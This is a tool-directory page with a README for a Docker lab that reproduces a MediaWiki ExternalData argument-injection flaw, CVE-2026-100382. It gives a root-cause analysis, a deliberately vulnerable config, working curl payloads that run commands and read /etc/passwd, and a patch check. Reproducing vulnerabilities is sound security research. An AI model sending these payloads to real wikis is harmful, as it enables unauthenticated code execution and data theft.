Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
mediawiki-CVE-2026-100382 — Docker lab reproducing CVE-2026-100382: unauthenticated argument-injection RCE in MediaWiki ExternalData's #get_program_data, with PoC payloads and patch verification. | Kitploit
Tools/GitHubGitHub/nth347/mediawiki-cve-2026-100382
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityCommand and ControlLearning & EducationLabs & Practice
GitHubnth347/mediawiki-cve-2026-100382

mediawiki-CVE-2026-100382

Docker lab reproducing CVE-2026-100382: unauthenticated argument-injection RCE in MediaWiki ExternalData's #get_program_data, with PoC payloads and patch verification.

View Repository
36 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Lab reproduction - CVE-2026-100382 (ExternalData OS command injection)

What this lab is

  • MediaWiki 1.43 (official image, SQLite) + ExternalData 3.6.1 (last vulnerable), mounted read-only from ../mediawiki-extensions-ExternalData.
  • Loopback only: published on 127.0.0.1:${HOST_PORT} (default 8080).
  • Anonymous editing + action=parse are enabled (MediaWiki defaults) - the PoC needs no login.

Run

cd lab
./up.sh        # installs, loads ExternalData 3.6.1, seeds vulnerable sources, prints URL
./down.sh      # docker compose down -v + wipe .env

The (realistic) vulnerable admin config

entrypoint.sh seeds an exec source that mirrors the documented purpose of #get_program_data - expose a server-side program to editors, passing a user parameter into the command line - without a restrictive param filters entry (the extension does not require one):

$wgExternalDataSources['chart'] = [
    'command' => 'python3 $options$ /srv/chart.py',   // user param interpolated
    'params'  => [ 'options' ],
    'format'  => 'text',
];

Intended use: {{#get_program_data: program=chart | options=--dpi=120 }} -> runs python3 --dpi=120 /srv/chart.py.

Root cause recap (why it fires)

  • EDConnectorBase::supplementParams() interpolates user params into the wiki-wide command template via strtr (EDConnectorBase.php:461-470,560).
  • EDConnectorExe::__construct() then does explode(' ', $command) (EDConnectorExe.php:92) - the interpolated user value is split on spaces into separate argv tokens with no re-quoting.
  • run() executes Shell::command($command)->execute() (EDConnectorExe.php:139). Shell::command() shell-escapes each token, so shell metacharacters (;, |) are inert - this is argument injection (CWE-88 / CWE-78), not naive shell injection. Controlling extra argv of the target program (here python3 -c) yields full code execution.
  • Note: a caller cannot supply command directly - the built-in wildcard * source forces command => null, which strips a user-supplied command. The vector is therefore parameter interpolation into an admin-defined command.

Console output (verbatim)

Scope: shell metacharacters are escaped (argument injection, not shell injection)

$ payload: {{#get_program_data: program=greet | name=World; id | data=out=__text }}{{#external_value: out }}
Hello World; id

Whitespace splits one parameter into multiple argv tokens

$ payload: {{#get_program_data: program=greet | name=a b c | data=out=__text }}{{#external_value: out }}
Hello a b c

RCE - arbitrary command execution as the web user (UNAUTHENTICATED)

$ curl -sS http://127.0.0.1:8080/api.php \
    --data-urlencode action=parse --data-urlencode format=json \
    --data-urlencode contentmodel=wikitext \
    --data-urlencode "text={{#get_program_data: program=chart | options=-c __import__('os').system('id') | data=out=__text }}{{#external_value: out }}"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Arbitrary file read

$ options=-c print(open('/etc/passwd').read())
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Negative test against the patch (closes the loop)

Swapping the mounted extension to tag 3.7 and re-running the SAME payload:

The class EDConnectorExe is disabled: instead of giving access to a local program,
consider using web access to a containerised application ... To enable it, a wiki
administrator will have to remove this class from the $wgExternalDataDisabledClasses
configuration setting.

3.7 disables EDConnectorExe by default ($wgExternalDataDisabledClasses, Bug T434961). Caveat: the sink code is unchanged - a wiki that removes EDConnectorExe from that list to keep using #get_program_data remains fully exploitable.

Download Tool